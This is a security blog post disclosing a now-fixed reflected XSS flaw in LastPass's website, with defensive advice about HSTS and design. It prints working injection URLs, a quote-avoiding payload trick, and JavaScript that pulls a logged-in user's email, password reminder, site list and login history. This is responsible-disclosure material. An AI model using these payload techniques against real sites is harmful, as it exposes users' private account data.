# LastPass Vulnerability Exposes Account Details

[LastPass](https://lastpass.com/) is a password manager that stores your website
login details in an encrypted container, protected by a master password, and
synced between your various browsers and machines. They provide browser plugins,
and also provide a web interface for you to access and manage your credentials.
They have both free and premium accounts, and they [recently
claimed](https://blog.lastpass.com/2011/01/lastpass-one-million-user-giveaway.html)
to have hit one million users. I found a serious vulnerability in their website.

I reported this vulnerability responsibly, and they fixed it within three hours.
If you're a LastPass user you should still be very concerned though; I believe
this is ultimately a problem with their architecture and something which could
easily happen again in future. Merely by visiting my website at the same time as
being logged in to LastPass (using the plugin or website), I could retrieve your
email address, your password reminder, the list of sites you log into and the
history of your logins, including which sites you logged into, the time and
dates you logged into them, and the IP addresses you logged in from.

And the cause of all this? A simple <abbr title="Cross-site
Scripting">XSS</abbr> flaw. If you are logged into lastpass.com or have the
browser plugin installed and logged in, visiting the following URL:

```text
https://lastpass.com/index.php?email=test@example.com
```

Causes a page to be dynamically generated, containing the email address passed
in the URL parameters. The email address is embedded inside a piece of
[jQuery](https://jquery.com/) JavaScript like so:

```javascript
$("#email").val("test@example.com");
```

To test if they properly escaped the email address, I tried passing a double
quotation mark along with it. They did properly escape it with a backslash and
it looked like this:

```javascript
$("#email").val("test@exa\"mple.com");
```

What they didn't properly handle though, were carriage returns. So by passing
test@exa%0Dmple.com in the email parameter, it gave this:

```javascript
$("#email").val("test@exa
mple.com");
```

This generated a JavaScript error on the page, because you're not allowed to
jump to a new line there. The trick which ultimately worked was to pass a
carriage return, followed by a closing and opening script tag. This closed off
the broken script, and started a new block of script. For example:

```text
https://lastpass.com/index.php?email=%0D%3C%2Fscript%3E%3Cscript%3Ealert(/XSS/.source);%3C%2Fscript%3E%3Cscript%3E
```

Created this:

```javascript
$("#email").val("
</script><script>alert(/XSS/.source)</script><script>
```

I had to use /XSS/.source rather than "XSS" because the quote marks would have
been escaped. Using the RegExp source attribute and global unescape function in
javascript allows you to write pretty much any code you want without having to
use quotation marks, which is handy when constructing XSS.

Now to use the vulnerability for something useful. The first thing I did was to
make it fetch the settings page using ajax, and parse the account email address
out of it. The URL for that looked like this:

```text
https://lastpass.com/index.php?email=%0D%3C%2Fscript%3E%3Cscript%3E%24%2Eget%28unescape%28%2Fhttps%253A%252F%252Flastpass%252Ecom%252Fsettings%252Ephp%253Fextjs%253D1%2F%2Esource%29%2Cfunction%28x%29%7By%3Dx%2Ematch%28%2Fvalue%3D%2E%28%5B%5E%3E%5D%2B%29%5B%5E%3E%5D%2F%29%3Balert%28y%5B1%5D%29%3B%7D%29%3B%3C%2Fscript%3E%3Cscript%3E%22
```

Which embedded some javascript like this (whitespace added for readability):

```javascript
$.get(
   unescape(	 
      /https%3A%2F%2Flastpass%2Ecom%2Fsettings%2Ephp%3Fextjs%3D1/.source
   ),
   function(x){
      y = x.match(/value=.([^>]+)[^>]/);
      alert(y[1]);
   }
);
```

Using the same technique I found I could fetch the users password reminder too.
Fetching and parsing https://lastpass.com/accts.php?fromindex=1 gave me a list
of all of the websites a user has login details for in LastPass. Fetching
https://lastpass.com/history.php?data=1 gave me a nice JSON formatted list of
websites the user logged into, the dates and times they logged into them, and
the IP addresses they used to log in from.

As well as fixing the XSS, they need to start using <abbr title="HTTP Strict
Transport Security">HSTS</abbr> too. A <abbr title="Man in the
Middle">MITM</abbr> could currently create a fake non-HTTPS lastpass.com page,
and trick the browser into fetching it, by embedding an iframe to some other
random non-HTTPS site that a user visits. Most of the tricks above will work
using that method even if they close the XSS hole. Seriously, if your site uses
HTTPS, you **need** to implement HSTS.

Of course, the holy grail would be fetching the list of sites along with their
usernames and passwords. I didn't achieve this, but I'm convinced it can be
done. Fetching "https://lastpass.com/show.php?aid=THEID" (Where "THEID" is a
site ID which can be found using the accts.php trick described a moment ago)
gave me the encrypted versions of the login details. Even if you don't have the
plugin installed, your browser somehow manages to decrypt and display them to
you. Figuring out how to do this would have involved picking through obfuscated
JavaScript.

I'm disappointed with LastPass. They should have designed their system using the
assumption that XSS vulnerabilities would be found on their website. As it
currently stands, any XSS vulnerability leads to the exposure of a treasure
trove of highly personal information. Perhaps it's just inherently dangerous to
outsource your password management to a third party.

**Update:** LastPass
[responded](https://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html)
to this blog post